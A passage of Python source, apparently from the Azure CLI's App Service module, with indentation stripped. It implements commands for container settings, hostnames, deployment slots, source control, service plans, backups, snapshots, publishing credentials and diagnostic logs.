docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise MutuallyExclusiveArgumentError('Usage error: --is-linux and --hyper-v cannot be used together.')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = application_logging != 'off'
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
level = application_logging != 'off'
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
